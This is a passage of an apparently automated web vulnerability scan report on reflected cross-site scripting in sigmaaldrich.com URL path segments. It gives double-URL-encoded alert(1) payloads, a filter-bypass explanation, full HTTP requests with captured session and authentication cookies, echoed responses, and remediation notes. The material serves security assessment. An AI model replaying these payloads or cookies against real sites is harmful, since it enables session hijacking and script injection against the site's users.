Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich233fa";alert(1)//bd0058c4543/customer-support/customer-service/services/mfg-production/oem-services","E404") ;
   </script>
...[SNIP]...

1.193. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f339%2522%253balert%25281%2529%252f%252f6ecc21c7619 was submitted in the REST URL parameter 3. This input was echoed as 1f339";alert(1)//6ecc21c7619 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support1f339%2522%253balert%25281%2529%252f%252f6ecc21c7619/customer-service/services/mfg-production/oem-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support1f339";alert(1)//6ecc21c7619/customer-service/services/mfg-production/oem-services","E404") ;
   </script>
...[SNIP]...

1.194. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb8f3%2522%253balert%25281%2529%252f%252f224aa488655 was submitted in the REST URL parameter 4. This input was echoed as bb8f3";alert(1)//224aa488655 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-servicebb8f3%2522%253balert%25281%2529%252f%252f224aa488655/services/mfg-production/oem-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:39 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-servicebb8f3";alert(1)//224aa488655/services/mfg-production/oem-services","E404") ;
   </script>
...[SNIP]...

1.195. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbeae%2522%253balert%25281%2529%252f%252fdd5596ba3db was submitted in the REST URL parameter 5. This input was echoed as dbeae";alert(1)//dd5596ba3db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/servicesdbeae%2522%253balert%25281%2529%252f%252fdd5596ba3db/mfg-production/oem-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:41 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/servicesdbeae";alert(1)//dd5596ba3db/mfg-production/oem-services","E404") ;
   </script>
...[SNIP]...

1.196. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 925a3%2522%253balert%25281%2529%252f%252fdb8225a6dbb was submitted in the REST URL parameter 6. This input was echoed as 925a3";alert(1)//db8225a6dbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/mfg-production925a3%2522%253balert%25281%2529%252f%252fdb8225a6dbb/oem-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:44 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/mfg-production925a3";alert(1)//db8225a6dbb/oem-services","E404") ;
   </script>
...[SNIP]...

1.197. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14ae7%2522%253balert%25281%2529%252f%252fa376a5f7f23 was submitted in the REST URL parameter 7. This input was echoed as 14ae7";alert(1)//a376a5f7f23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services14ae7%2522%253balert%25281%2529%252f%252fa376a5f7f23 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
